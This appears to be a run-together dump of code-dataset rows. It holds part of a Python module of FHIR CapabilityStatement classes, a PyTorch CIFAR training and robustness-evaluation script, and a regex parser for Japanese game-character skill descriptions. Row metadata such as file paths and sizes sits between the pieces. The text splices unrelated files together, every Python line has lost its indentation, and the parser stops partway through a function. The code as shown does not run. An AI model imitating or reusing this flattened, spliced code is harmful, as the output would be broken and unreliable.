A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: The mode of this event declaration - whether application is
sender or receiver.
definition: Points to a message definition that identifies the
messaging event, message structure, allowed responses, etc.
"""
__name__ = 'CapabilityStatement_SupportedMessage'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: sender, receiver
self.definition = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'sender', 'receiver']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'sender, receiver'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_SupportedMessage',
'child_variable': 'definition'},
]
class CapabilityStatement_Event(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of a supported messaging event.
category: The impact of the content of the message.
mode: The mode of this event declaration - whether an application is a
sender or receiver.
focus: A resource associated with the event. This is the resource
that defines the event.
request: Information about the request for this event.
response: Information about the response for this event.
documentation: Guidance on how this event is handled, such as internal
system trigger points, business rules, etc.
"""
__name__ = 'CapabilityStatement_Event'
def __init__(self, dict_values=None):
self.code = None
# reference to Coding
self.category = None
# type: str
# possible values: Consequence, Currency, Notification
self.mode = None
# type: str
# possible values: sender, receiver
self.focus = None
# type: str
self.request = None
# reference to Reference: identifier
self.response = None
# reference to Reference: identifier
self.documentation = None
# type: str
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.category is not None:
for value in self.category:
if value is not None and value.lower() not in [
'consequence', 'currency', 'notification']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'Consequence, Currency, Notification'))
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'sender', 'receiver']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'sender, receiver'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'request'},
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'response'},
{'parent_entity': 'Coding',
'parent_variable': 'object_id',
'child_entity': 'CapabilityStatement_Event',
'child_variable': 'code'},
]
class CapabilityStatement_Document(fhirbase):
"""
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Mode of this document declaration - whether an application is a
producer or consumer.
documentation: A description of how the application supports or uses
the specified document profile. For example, when documents are
created, what action is taken with consumed documents, etc.
profile: A constraint on a resource used in the document.
"""
__name__ = 'CapabilityStatement_Document'
def __init__(self, dict_values=None):
self.mode = None
# type: str
# possible values: producer, consumer
self.documentation = None
# type: str
self.profile = None
# reference to Reference: identifier
self.object_id = None
# unique identifier for object class
if dict_values:
self.set_attributes(dict_values)
self.assert_type()
def assert_type(self):
if self.mode is not None:
for value in self.mode:
if value is not None and value.lower() not in [
'producer', 'consumer']:
raise ValueError('"{}" does not match possible values: {}'.format(
value, 'producer, consumer'))
def get_relationships(self):
return [
{'parent_entity': 'Reference',
'parent_variable': 'identifier',
'child_entity': 'CapabilityStatement_Document',
'child_variable': 'profile'},
]
| cardea/fhir/CapabilityStatement.py | 42,927 | A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
resourceType: This is a CapabilityStatement resource
url: An absolute URI that is used to identify this capability
statement when it is referenced in a specification, model, design or
an instance. This SHALL be a URL, SHOULD be globally unique, and
SHOULD be an address at which this capability statement is (or will
be) published. The URL SHOULD include the major version of the
capability statement. For more information see [Technical and Business
Versions](resource.html#versions).
version: The identifier that is used to identify this version of the
capability statement when it is referenced in a specification, model,
design or instance. This is an arbitrary value managed by the
capability statement author and is not expected to be globally unique.
For example, it might be a timestamp (e.g. yyyymmdd) if a managed
version is not available. There is also no expectation that versions
can be placed in a lexicographical sequence.
name: A natural language name identifying the capability statement.
This name should be usable as an identifier for the module by machine
processing applications such as code generation.
title: A short, descriptive, user-friendly title for the capability
statement.
status: The status of this capability statement. Enables tracking the
life-cycle of the content.
experimental: A boolean value to indicate that this capability
statement is authored for testing purposes (or
education/evaluation/marketing), and is not intended to be used for
genuine usage.
date: The date (and optionally time) when the capability statement
was published. The date must change if and when the business version
changes and it must change if the status code changes. In addition, it
should change when the substantive content of the capability statement
changes.
publisher: The name of the individual or organization that published
the capability statement.
contact: Contact details to assist a user in finding and communicating
with the publisher.
description: A free text natural language description of the
capability statement from a consumer's perspective. Typically, this is
used when the capability statement describes a desired rather than an
actual solution, for example as a formal expression of requirements as
part of an RFP.
useContext: The content was developed with a focus and intent of
supporting the contexts that are listed. These terms may be used to
assist with indexing and searching for appropriate capability
statement instances.
jurisdiction: A legal or geographic region in which the capability
statement is intended to be used.
purpose: Explaination of why this capability statement is needed and
why it has been designed as it has.
copyright: A copyright statement relating to the capability statement
and/or its contents. Copyright statements are generally legal
restrictions on the use and publishing of the capability statement.
kind: The way that this statement is intended to be used, to describe
an actual running instance of software, a particular product (kind not
instance of software) or a class of implementation (e.g. a desired
purchase).
instantiates: Reference to a canonical URL of another
CapabilityStatement that this software implements or uses. This
capability statement is a published API description that corresponds
to a business service. The rest of the capability statement does not
need to repeat the details of the referenced resource, but can do so.
software: Software that is covered by this capability statement. It
is used when the capability statement describes the capabilities of a
particular software version, independent of an installation.
implementation: Identifies a specific implementation instance that is
described by the capability statement - i.e. a particular
installation, rather than the capabilities of a software program.
fhirVersion: The version of the FHIR specification on which this
capability statement is based.
acceptUnknown: A code that indicates whether the application accepts
unknown elements or extensions when reading resources.
format: A list of the formats supported by this implementation using
their content types.
patchFormat: A list of the patch formats supported by this
implementation using their content types.
implementationGuide: A list of implementation guides that the server
does (or should) support in their entirety.
profile: A list of profiles that represent different use cases
supported by the system. For a server, "supported by the system" means
the system hosts/produces a set of resources that are conformant to a
particular profile, and allows clients that use its services to search
using this profile and to find appropriate data. For a client, it
means the system will search by this profile and process data
according to the guidance implicit in the profile. See further
discussion in [Using Profiles](profiling.html#profile-uses).
rest: A definition of the restful capabilities of the solution, if
any.
messaging: A description of the messaging capabilities of the
solution.
document: A document definition.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: Mime type for a certificate.
blob: Actual certificate.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Mode of this document declaration - whether an application is a
producer or consumer.
documentation: A description of how the application supports or uses
the specified document profile. For example, when documents are
created, what action is taken with consumed documents, etc.
profile: A constraint on a resource used in the document.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
protocol: A list of the messaging transport protocol(s) identifiers,
supported by this endpoint.
address: The network address of the end-point. For solutions that do
not use network addresses for routing, it can be just an identifier.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of a supported messaging event.
category: The impact of the content of the message.
mode: The mode of this event declaration - whether an application is a
sender or receiver.
focus: A resource associated with the event. This is the resource
that defines the event.
request: Information about the request for this event.
response: Information about the response for this event.
documentation: Guidance on how this event is handled, such as internal
system trigger points, business rules, etc.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
description: Information about the specific installation that this
capability statement relates to.
url: An absolute base URL for the implementation. This forms the base
for REST interfaces as well as the mailbox and document interfaces.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: Coded identifier of the operation, supported by the system
resource.
documentation: Guidance specific to the implementation of this
operation, such as 'delete is a logical delete' or 'updates are only
allowed with version id' or 'creates permitted from pre-authorized
certificates only'.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
code: A coded identifier of the operation, supported by the system.
documentation: Guidance specific to the implementation of this
operation, such as limitations on the kind of transactions allowed, or
information about system wide search is implemented.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
endpoint: An endpoint (network accessible address) to which messages
and/or replies are to be sent.
reliableCache: Length if the receiver's reliable messaging cache in
minutes (if a receiver) or how long the cache length on the receiver
should be (if a sender).
documentation: Documentation about the system's messaging capabilities
for this endpoint not otherwise documented by the capability
statement. For example, the process for becoming an authorized
messaging exchange partner.
supportedMessage: References to message definitions for messages this
system can send or receive.
event: A description of the solution's support for an event at this
end-point.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the operation or query. For an operation, this is
the name prefixed with $ and used in the URL. For a query, this is
the name used in the _query parameter when the query is called.
definition: Where the formal definition can be found.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
type: A type of resource exposed via the restful interface.
profile: A specification of the profile that describes the solution's
overall support for the resource, including any constraints on
cardinality, bindings, lengths or other limitations. See further
discussion in [Using Profiles](profiling.html#profile-uses).
documentation: Additional information about the resource type used by
the system.
interaction: Identifies a restful operation supported by the solution.
versioning: This field is set to no-version to specify that the system
does not support (server) or use (client) versioning for this resource
type. If this has some other value, the server must at least correctly
track and populate the versionId meta-property on resources. If the
value is 'versioned-update', then the server supports all the
versioning features, including using e-tags for version integrity in
the API.
readHistory: A flag for whether the server is able to return past
versions as part of the vRead operation.
updateCreate: A flag to indicate that the server allows or needs to
allow the client to create new identities on the server (e.g. that is,
the client PUTs to a location where there is no existing resource).
Allowing this operation means that the server allows the client to
create new identities on the server.
conditionalCreate: A flag that indicates that the server supports
conditional create.
conditionalRead: A code that indicates how the server supports
conditional read.
conditionalUpdate: A flag that indicates that the server supports
conditional update.
conditionalDelete: A code that indicates how the server supports
conditional delete.
referencePolicy: A set of flags that defines how references are
supported.
searchInclude: A list of _include values supported by the server.
searchRevInclude: A list of _revinclude (reverse include) values
supported by the server.
searchParam: Search parameters for implementations to support and/or
make use of - either references to ones defined in the specification,
or additional ones defined for/by the implementation.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: Identifies whether this portion of the statement is describing
the ability to initiate or receive restful operations.
documentation: Information about the system's restful capabilities
that apply across all applications, such as security.
security: Information about security implementation from an interface
perspective - what a client needs to know.
resource: A specification of the restful capabilities of the solution
for a specific resource type.
interaction: A specification of restful operations supported by the
system.
searchParam: Search parameters that are supported for searching all
resources for implementations to support and/or make use of - either
references to ones defined in the specification, or additional ones
defined for/by the implementation.
operation: Definition of an operation or a named query together with
its parameters and their meaning and type.
compartment: An absolute URI which is a reference to the definition of
a compartment that the system supports. The reference is to a
CompartmentDefinition resource by its canonical URL .
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: The name of the search parameter used in the interface.
definition: An absolute URI that is a formal reference to where this
parameter was first defined, so that a client can be confident of the
meaning of the search parameter (a reference to
[[[SearchParameter.url]]]).
type: The type of value a search parameter refers to, and how the
content is interpreted.
documentation: This allows documentation of any distinct behaviors
about how the search parameter is used. For example, text matching
algorithms.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
cors: Server adds CORS headers when responding to requests - this
enables javascript applications to use the server.
service: Types of security services that are supported/required by the
system.
description: General description of how security works.
certificate: Certificates associated with security profiles.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
name: Name software is known by.
version: The version identifier for the software covered by this
statement.
releaseDate: Date this version of the software was released.
A Capability Statement documents a set of capabilities (behaviors) of
a FHIR Server that may be used as a statement of actual server
functionality or a statement of required or desired server
implementation.
Attributes:
mode: The mode of this event declaration - whether application is
sender or receiver.
definition: Points to a message definition that identifies the
messaging event, message structure, allowed responses, etc.
type: str possible values: CapabilityStatement type: str type: str type: str type: str type: str possible values: draft, active, retired, unknown type: bool type: str type: str type: list reference to ContactDetail type: str type: list reference to UsageContext type: list reference to CodeableConcept type: str type: str type: str possible values: instance, capability, requirements type: list reference to CapabilityStatement_Software reference to CapabilityStatement_Implementation type: str type: str possible values: no, extensions, elements, both type: list type: list type: list type: list reference to Reference: identifier type: list reference to CapabilityStatement_Rest type: list reference to CapabilityStatement_Messaging type: list reference to CapabilityStatement_Document unique identifier for object class type: str type: str type: str unique identifier for object class type: str type: str unique identifier for object class type: str possible values: client, server type: str reference to CapabilityStatement_Security type: list reference to CapabilityStatement_Resource type: list reference to CapabilityStatement_Interaction1 type: list reference to CapabilityStatement_SearchParam type: list reference to CapabilityStatement_Operation type: list unique identifier for object class type: bool type: list reference to CodeableConcept type: str type: list reference to CapabilityStatement_Certificate unique identifier for object class type: str type: str unique identifier for object class type: str reference to Reference: identifier type: str type: list reference to CapabilityStatement_Interaction type: str possible values: no-version, versioned, versioned-update type: bool type: bool type: bool type: str possible values: not-supported, modified-since, not-match, full-support type: bool type: str possible values: not-supported, single, multiple type: list possible values: literal, logical, resolves, enforced, local type: list type: list type: list reference to CapabilityStatement_SearchParam unique identifier for object class type: str possible values: read, vread, update, patch, delete, history-instance, history-type, create, search-type type: str unique identifier for object class type: str type: str type: str possible values: number, date, string, token, reference, composite, quantity, uri type: str unique identifier for object class type: str possible values: transaction, batch, search-system, history-system type: str unique identifier for object class type: str reference to Reference: identifier unique identifier for object class type: list reference to CapabilityStatement_Endpoint type: int type: str type: list reference to CapabilityStatement_SupportedMessage type: list reference to CapabilityStatement_Event unique identifier for object class reference to Coding type: str unique identifier for object class type: str possible values: sender, receiver reference to Reference: identifier unique identifier for object class reference to Coding type: str possible values: Consequence, Currency, Notification type: str possible values: sender, receiver type: str reference to Reference: identifier reference to Reference: identifier type: str unique identifier for object class type: str possible values: producer, consumer type: str reference to Reference: identifier unique identifier for object class | 20,571 | en | 0.806964 |
import os
import sys
import argparse
import datetime
import time
import csv
import os.path as osp
import numpy as np
import warnings
import importlib
import pandas as pd
warnings.filterwarnings('ignore')
import torch
import torch.nn as nn
from torch.optim import lr_scheduler
import torch.backends.cudnn as cudnn
import torchvision
from datasets import CIFAR10D, CIFAR100D
from utils.utils import AverageMeter, Logger, save_networks, load_networks
from core import train, test, test_robustness
parser = argparse.ArgumentParser("Training")
# dataset
parser.add_argument('--data', type=str, default='./data')
parser.add_argument('--outf', type=str, default='./results')
parser.add_argument('-d', '--dataset', type=str, default='cifar10')
parser.add_argument('--workers', default=8, type=int, help="number of data loading workers (default: 4)")
# optimization
parser.add_argument('--batch-size', type=int, default=128)
parser.add_argument('--lr', type=float, default=0.1, help="learning rate for model")
parser.add_argument('--max-epoch', type=int, default=200)
parser.add_argument('--stepsize', type=int, default=30)
parser.add_argument('--aug', type=str, default='none', help='none, aprs')
# model
parser.add_argument('--model', type=str, default='wider_resnet_28_10')
# misc
parser.add_argument('--eval-freq', type=int, default=10)
parser.add_argument('--print-freq', type=int, default=100)
parser.add_argument('--gpu', type=str, default='0')
parser.add_argument('--seed', type=int, default=0)
parser.add_argument('--use-cpu', action='store_true')
parser.add_argument('--eval', action='store_true', help="Eval", default=False)
# parameters for generating adversarial examples
parser.add_argument('--epsilon', '-e', type=float, default=0.0157,
help='maximum perturbation of adversaries (4/255=0.0157)')
parser.add_argument('--alpha', '-a', type=float, default=0.00784,
help='movement multiplier per iteration when generating adversarial examples (2/255=0.00784)')
parser.add_argument('--k', '-k', type=int, default=10,
help='maximum iteration when generating adversarial examples')
parser.add_argument('--perturbation_type', '-p', choices=['linf', 'l2'], default='linf',
help='the type of the perturbation (linf or l2)')
args = parser.parse_args()
options = vars(args)
if not os.path.exists(options['outf']):
os.makedirs(options['outf'])
if not os.path.exists(options['data']):
os.makedirs(options['data'])
sys.stdout = Logger(osp.join(options['outf'], 'logs.txt'))
def main():
torch.manual_seed(options['seed'])
os.environ['CUDA_VISIBLE_DEVICES'] = options['gpu']
use_gpu = torch.cuda.is_available()
if options['use_cpu']: use_gpu = False
options.update({'use_gpu': use_gpu})
if use_gpu:
print("Currently using GPU: {}".format(options['gpu']))
cudnn.benchmark = True
torch.cuda.manual_seed_all(options['seed'])
else:
print("Currently using CPU")
if 'cifar10' == options['dataset']:
Data = CIFAR10D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'], _eval=options['eval'])
OODData = CIFAR100D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'])
else:
Data = CIFAR100D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'], _eval=options['eval'])
OODData = CIFAR10D(dataroot=options['data'], batch_size=options['batch_size'], _transforms=options['aug'])
trainloader, testloader, outloader = Data.train_loader, Data.test_loader, OODData.test_loader
num_classes = Data.num_classes
print("Creating model: {}".format(options['model']))
if 'wide_resnet' in options['model']:
print('wide_resnet')
from model.wide_resnet import WideResNet
net = WideResNet(40, num_classes, 2, 0.0)
elif 'allconv' in options['model']:
print('allconv')
from model.allconv import AllConvNet
net = AllConvNet(num_classes)
elif 'densenet' in options['model']:
print('densenet')
from model.densenet import densenet
net = densenet(num_classes=num_classes)
elif 'resnext' in options['model']:
print('resnext29')
from model.resnext import resnext29
net = resnext29(num_classes)
else:
print('resnet18')
from model.resnet import ResNet18
net = ResNet18(num_classes=num_classes)
# define loss function (criterion) and optimizer
criterion = nn.CrossEntropyLoss().cuda()
if use_gpu:
net = nn.DataParallel(net, device_ids=[i for i in range(len(options['gpu'].split(',')))]).cuda()
criterion = criterion.cuda()
file_name = '{}_{}_{}'.format(options['model'], options['dataset'], options['aug'])
if options['eval']:
net, criterion = load_networks(net, options['outf'], file_name, criterion=criterion)
outloaders = Data.out_loaders
results = test(net, criterion, testloader, outloader, epoch=0, **options)
acc = results['ACC']
res = dict()
res['ACC'] = dict()
acc_res = []
for key in Data.out_keys:
results = test_robustness(net, criterion, outloaders[key], epoch=0, label=key, **options)
print('{} (%): {:.3f}\t'.format(key, results['ACC']))
res['ACC'][key] = results['ACC']
acc_res.append(results['ACC'])
print('Mean ACC:', np.mean(acc_res))
print('Mean Error:', 100-np.mean(acc_res))
return
params_list = [{'params': net.parameters()},
{'params': criterion.parameters()}]
optimizer = torch.optim.SGD(params_list, lr=options['lr'], momentum=0.9, nesterov=True, weight_decay=5e-4)
scheduler = lr_scheduler.MultiStepLR(optimizer, gamma=0.2, milestones=[60, 120, 160, 190])
start_time = time.time()
best_acc = 0.0
for epoch in range(options['max_epoch']):
print("==> Epoch {}/{}".format(epoch+1, options['max_epoch']))
train(net, criterion, optimizer, trainloader, epoch=epoch, **options)
if options['eval_freq'] > 0 and (epoch+1) % options['eval_freq'] == 0 or (epoch+1) == options['max_epoch'] or epoch > 160:
print("==> Test")
results = test(net, criterion, testloader, outloader, epoch=epoch, **options)
if best_acc < results['ACC']:
best_acc = results['ACC']
print("Best Acc (%): {:.3f}\t".format(best_acc))
save_networks(net, options['outf'], file_name, criterion=criterion)
scheduler.step()
elapsed = round(time.time() - start_time)
elapsed = str(datetime.timedelta(seconds=elapsed))
print("Finished. Total elapsed time (h:m:s): {}".format(elapsed))
if __name__ == '__main__':
main()
| main.py | 6,885 | dataset optimization model misc parameters for generating adversarial examples define loss function (criterion) and optimizer | 125 | en | 0.490819 |
import requests
from bs4 import BeautifulSoup
import jinja2
import re
class Chara:
name = ''
job = ''
hp = 0
mp = 0
str = 0
end = 0
dex = 0
agi = 0
mag = 0
killer = ""
counter_hp = ""
skills = ""
passive_skills = ""
class HtmlParser:
def __init__(self, text):
self.soup = BeautifulSoup(text, 'html.parser')
self.soup_ptr = self.soup.find("div", class_='toc')
def get_next_div(self):
found = False
while not found:
self.soup_ptr = self.soup_ptr.find_next_sibling("div", class_='basic')
if self.soup_ptr.find("table") is not None:
found = True
return self.soup_ptr
def parse_effs(effs_str):
effs = []
if "カウンター率" in effs_str:
effs.append("Ability.counter_rate")
if "ペネトレーション率" in effs_str:
effs.append("Ability.pene_rate")
if "必殺技ゲージ" in effs_str:
effs.append("Ability.energy_bar")
if "クリティカル率" in effs_str:
effs.append("Ability.crit_rate")
if "ガード率" in effs_str:
effs.append("Ability.guard_rate")
if "カウンター発生" in effs_str:
effs.append("SuccessUp.counter")
if "ペネトレーション発生" in effs_str:
effs.append("SuccessUp.pene")
if "クリティカル発生" in effs_str:
effs.append("SuccessUp.crit")
if "ガード発生" in effs_str:
effs.append("SuccessUp.guard")
if "力と魔力" in effs_str:
effs.append("Ability.str")
effs.append("Ability.mag")
elif "力と" in effs_str:
effs.append("Ability.str")
elif "力、魔力" in effs_str:
effs.append("Ability.str")
effs.append("Ability.mag")
elif "魔力" in effs_str:
effs.append("Ability.mag")
elif "の力" in effs_str:
effs.append("Ability.str")
elif "、力" in effs_str:
effs.append("Ability.str")
elif effs_str.startswith("力"):
effs.append("Ability.str")
if "敏捷" in effs_str:
effs.append("Ability.agi")
if "器用" in effs_str:
effs.append("Ability.dex")
if "耐久" in effs_str:
effs.append("Ability.end")
if "火属性耐性" in effs_str:
effs.append("Endurance.fire")
if "地属性耐性" in effs_str:
effs.append("Endurance.earth")
if "風属性耐性" in effs_str:
effs.append("Endurance.wind")
if "水属性耐性" in effs_str:
effs.append("Endurance.ice")
if "雷属性耐性" in effs_str:
effs.append("Endurance.thunder")
if "光属性耐性" in effs_str:
effs.append("Endurance.light")
if "闇属性耐性" in effs_str:
effs.append("Endurance.dark")
if "物理耐性" in effs_str:
effs.append("Endurance.phy")
if "魔法耐性" in effs_str:
effs.append("Endurance.mag")
if "全体攻撃ダメージ" in effs_str:
effs.append("Endurance.foes")
if "単体攻撃ダメージ" in effs_str:
effs.append("Endurance.foe")
if "火属性攻撃" in effs_str:
effs.append("Damage.fire")
if "地属性攻撃" in effs_str:
effs.append("Damage.earth")
if "風属性攻撃" in effs_str:
effs.append("Damage.wind")
if "水属性攻撃" in effs_str:
effs.append("Damage.ice")
if "雷属性攻撃" in effs_str:
effs.append("Damage.thunder")
if "光属性攻撃" in effs_str:
effs.append("Damage.light")
if "闇属性攻撃" in effs_str:
effs.append("Damage.dark")
if "全体攻撃被ダメージ" in effs_str:
effs.append("Endurance.foes")
if "単体攻撃被ダメージ" in effs_str:
effs.append("Endurance.foe")
if "HP" in effs_str or "HP" in effs_str:
effs.append("Recover.hp_turn")
if "MP" in effs_str or "MP" in effs_str:
effs.append("Recover.mp_turn")
return effs
def gen_eff_str(effs, scope, val_for_eff=None, turn=None):
eff_enums = []
for e in effs:
if turn and val_for_eff:
eff_enums.append(f"Effect({scope}, {e}, {val_for_eff}, {turn})")
elif val_for_eff:
eff_enums.append(f"Effect({scope}, {e}, {val_for_eff})")
else:
eff_enums.append(f"Effect({scope}, {e}, 0)")
ret = ", ".join(eff_enums)
return ret
def parse_turns(text):
m = re.match(r".+(\d)ターンの間.+", text, re.UNICODE)
if m is None:
return None
turn = m.group(1)
return turn
def parse_scope(scope_str):
if "敵全体" in scope_str:
scope = "Scope.foes"
elif "敵単体" in scope_str:
scope = "Scope.foe"
elif "味方全体" in scope_str:
scope = "Scope.my_team"
elif "自分" in scope_str:
scope = "Scope.my_self"
else:
raise ValueError
return scope
def parse_atk(text):
scope = parse_scope(text)
if "超強威力" in text:
power = "Power.ultra"
elif "超威力" in text:
power = "Power.super"
elif "強威力" in text:
power = "Power.high"
elif "中威力" in text:
power = "Power.mid"
elif "弱威力" in text:
power = "Power.low"
else:
raise ValueError
m = re.match(r".+(\w)属性(\w\w)攻撃.+", text, re.UNICODE)
attr = m.group(1)
phy_mag = m.group(2)
if attr == "火":
attr_dmg = "Damage.fire"
elif attr == "地":
attr_dmg = "Damage.earth"
elif attr == "風":
attr_dmg = "Damage.wind"
elif attr == "水":
attr_dmg = "Damage.ice"
elif attr == "雷":
attr_dmg = "Damage.thunder"
elif attr == "光":
attr_dmg = "Damage.light"
elif attr == "闇":
attr_dmg = "Damage.dark"
else:
raise ValueError
if phy_mag == "物理":
atk = "Attack.phy"
elif phy_mag == "魔法":
atk = "Attack.mag"
else:
raise ValueError
temp_boost = ""
if "技発動時のみ力を上昇" in text or "技発動時のみ魔力を上昇" in text:
temp_boost = "temp_boost=True, "
boost_by_buff = ""
m = re.match(r".*自分の(\w+)上昇効果1つにつき、この技の威力が(\d+)[%%]上昇.*", text, re.UNICODE)
if m is not None:
up_val = int(m.group(2))
up_val /= 100
up_indexes = m.group(1)
effs = parse_effs(up_indexes)
enum_str = gen_eff_str(effs, "Scope.my_self", up_val)
boost_by_buff = f'boost_by_buff=[{enum_str}],'
atk_str = f"{scope}, {power}, {attr_dmg}, {atk}, {temp_boost} {boost_by_buff}"
return atk_str
def parse_debuff(text, turn):
m = re.match(r".*(敵単体|敵全体)(.+?)を?(\d+)[%%]減少.*", text, re.UNICODE)
if m is None:
m = re.match(r".+(敵単体|敵全体)(.+被ダメージ).*を(\d+)[%%]増加.*", text, re.UNICODE)
if m is None:
return None
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
down_val = int(m.group(3))
down_val /= 100
enum_str = gen_eff_str(effs, scope, down_val, turn)
return enum_str
def parse_recover_hp(text, turn):
m = re.match(r".*(\d+)ターンの間、(味方全体|自分)に(\d+)[%%]の(HP|HP)治癒付与.*", text, re.UNICODE)
if m:
turn = m.group(1)
scope = parse_scope(m.group(2))
up_val = int(m.group(3)) / 100
return f"Effect({scope}, Recover.hp_turn, {up_val}, {turn})"
m = re.match(r".*味方全体に\w+の(HP|HP)回復技.*", text, re.UNICODE)
if m:
return f"Effect(Scope.my_team, Recover.hp_imm, 0.8)"
m = re.match(r".*味方全体の(HP|HP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_team, Recover.hp_imm, {up_val})"
def parse_recover_mp(text, turn):
m = re.match(r".*(\d+)ターンの間、(味方全体|自分)に(\d+)[%%]の(MP|MP)回復.*", text, re.UNICODE)
if m:
turn = m.group(1)
scope = parse_scope(m.group(2))
up_val = int(m.group(3)) / 100
return f"Effect({scope}, Recover.mp_turn, {up_val}, {turn})"
m = re.match(r".*味方全体の(MP|MP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_team, Recover.mp_imm, {up_val})"
m = re.match(r".*自分の(MP|MP)を(\d+)[%%]回復.*", text, re.UNICODE)
if m:
up_val = int(m.group(2)) / 100
return f"Effect(Scope.my_self, Recover.mp_imm, {up_val})"
def parse_buff(text, turn):
m = re.match(r".*(味方全体|自分)(.+)を(\d+)[%%](上昇|軽減).*", text, re.UNICODE)
if m is None:
return None
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
up_val = int(m.group(3))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val, turn)
return enum_str
def parse_passive_buff(text):
ret_effs = []
scope = "Scope.my_self"
m = re.match(r"(.+)が(\d+)[%%]上昇.*", text, re.UNICODE)
if m:
effs_str = m.group(1)
effs = parse_effs(effs_str)
effs = [e for e in effs if "Ability" not in e]
up_val = int(m.group(2))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val)
ret_effs.append(enum_str)
m = re.match(r".*毎ターン(.+)が(\d+)[%%]回復.*", text, re.UNICODE)
if m:
effs_str = m.group(1)
effs = parse_effs(effs_str)
up_val = int(m.group(2))
up_val /= 100
enum_str = gen_eff_str(effs, scope, up_val)
ret_effs.append(enum_str)
return ", ".join(ret_effs)
def parse_adj_buff(text):
ret_effs = []
m = re.match(r".*(敵単体|敵全体)の(.+)上昇効果を解除.*", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
effs_str = m.group(2)
effs = parse_effs(effs_str)
for e in effs:
enum_str = f"Effect({scope}, AdjBuff.clear_buff, 0, 0, {e})"
ret_effs.append(enum_str)
m = re.match(r".*(自分|味方全体)のステイタス上昇効果.*(\d+)ターン延長", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.extend_buff, {turn_val}, 0)"
ret_effs.append(enum_str)
m = re.match(r".*(敵単体|敵全体)のステイタス減少効果.*(\d+)ターン延長", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.extend_debuff, {turn_val}, 0)"
ret_effs.append(enum_str)
m = re.match(r".*(敵単体|敵全体)のステイタス上昇効果.*(\d+)ターン減少", text, re.UNICODE)
if m:
scope = parse_scope(m.group(1))
turn_val = m.group(2)
enum_str = f"Effect({scope}, AdjBuff.shorten_buff, {turn_val}, 0)"
ret_effs.append(enum_str)
return ", ".join(ret_effs)
def gen_skill_str(text, is_special=False):
text = text.replace("\n", "")
text = text.replace("・", "")
print(text)
atk_str = ""
mp_str = ""
special_str = ""
is_fast_str = ""
if "すばやく" in text:
is_fast_str = "is_fast=True, "
if "攻撃。" in text:
